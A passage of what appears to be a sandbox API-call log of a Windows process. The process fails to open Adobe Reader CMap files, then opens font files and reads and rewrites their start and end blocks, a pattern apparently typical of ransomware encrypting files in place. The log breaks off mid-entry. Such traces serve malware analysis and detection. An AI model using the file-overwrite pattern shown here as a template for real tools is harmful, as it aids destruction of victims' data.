0x19 [0085.637] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.640] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.641] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.641] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-host")) returned 0x20 [0085.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.641] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V", lpFilePart=0x311f690*="B5pc-V") returned 0x3d [0085.641] GetLastError () returned 0x5 [0085.641] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.641] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.641] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.641] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.668] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.668] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.668] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-v")) returned 0x20 [0085.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.669] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H", lpFilePart=0x311f690*="ETHK-B5-H") returned 0x40 [0085.669] GetLastError () returned 0x5 [0085.669] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.669] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.669] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.670] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.670] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.670] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.670] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-h")) returned 0x20 [0085.671] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.671] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H", lpFilePart=0x311f690*="GBK-EUC-H") returned 0x40 [0085.672] GetLastError () returned 0x5 [0085.672] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.672] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.672] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.672] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.672] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.672] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.672] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-h")) returned 0x20 [0085.673] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.674] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2", lpFilePart=0x311f690*="GBpc-EUC-UCS2") returned 0x44 [0085.674] GetLastError () returned 0x5 [0085.674] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.674] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.674] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.674] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.675] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.675] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.675] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2")) returned 0x20 [0085.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.675] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H", lpFilePart=0x311f690*="HKdlb-B5-H") returned 0x41 [0085.675] GetLastError () returned 0x5 [0085.676] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.676] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.676] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.676] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.676] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.676] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.676] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-h")) returned 0x20 [0085.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.678] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H", lpFilePart=0x311f690*="HKscs-B5-H") returned 0x41 [0085.678] GetLastError () returned 0x5 [0085.678] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.678] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.678] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.678] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.678] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.679] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.679] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-h")) returned 0x20 [0085.679] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.972] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V", lpFilePart=0x311f690*="KSCms-UHC-HW-V") returned 0x45 [0085.972] GetLastError () returned 0x5 [0085.972] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.973] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.973] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.973] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0086.007] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.007] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.007] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-HW-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-hw-v")) returned 0x20 [0086.008] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-b5pc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.008] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc", lpFilePart=0x311f690*="UCS2-B5pc") returned 0x40 [0086.008] GetLastError () returned 0x5 [0086.008] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0086.008] LocalFree (hMem=0x69e2b0) returned 0x0 [0086.008] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0086.008] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0086.009] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.009] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.009] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-B5pc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-b5pc")) returned 0x20 [0086.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.202] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H", lpFilePart=0x311f690*="UniCNS-UTF16-H") returned 0x45 [0086.202] GetLastError () returned 0x5 [0086.202] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0086.202] LocalFree (hMem=0x69e2b0) returned 0x0 [0086.202] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0086.203] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0086.223] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.223] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.223] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-h")) returned 0x20 [0086.223] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V", lpFilePart=0x311f690*="UniJIS-UCS2-HW-V") returned 0x47 [0086.293] GetLastError () returned 0x5 [0086.293] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0086.293] LocalFree (hMem=0x69e2b0) returned 0x0 [0086.293] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0086.293] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0086.294] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.294] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.294] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-HW-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-hw-v")) returned 0x20 [0086.294] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H", lpFilePart=0x311f690*="UniKS-UTF16-H") returned 0x44 [0086.295] GetLastError () returned 0x5 [0086.295] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0086.295] LocalFree (hMem=0x69e2b0) returned 0x0 [0086.295] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0086.295] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0086.295] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.296] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0086.296] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-h")) returned 0x20 [0086.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.297] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.297] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x11ad0 [0086.298] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.298] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.298] ReleaseMutex (hMutex=0x168) returned 1 [0086.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-BoldItalic.otf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0086.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-BoldItalic.otf", cchWideChar=26, lpMultiByteStr=0x1f8fedc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeHebrew-BoldItalic.otf", lpUsedDefaultChar=0x0) returned 26 [0086.298] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.306] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x10ad0 [0086.306] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.428] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x10ad0 [0086.428] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.429] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0086.429] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.429] CloseHandle (hObject=0x1ec) returned 1 [0086.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.430] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.430] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x8b9c [0086.431] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.431] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.431] ReleaseMutex (hMutex=0x168) returned 1 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd-Bold.otf", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd-Bold.otf", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CourierStd-Bold.otf", lpUsedDefaultChar=0x0) returned 19 [0086.431] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.437] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7b9c [0086.437] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.721] SetFilePointer (in: 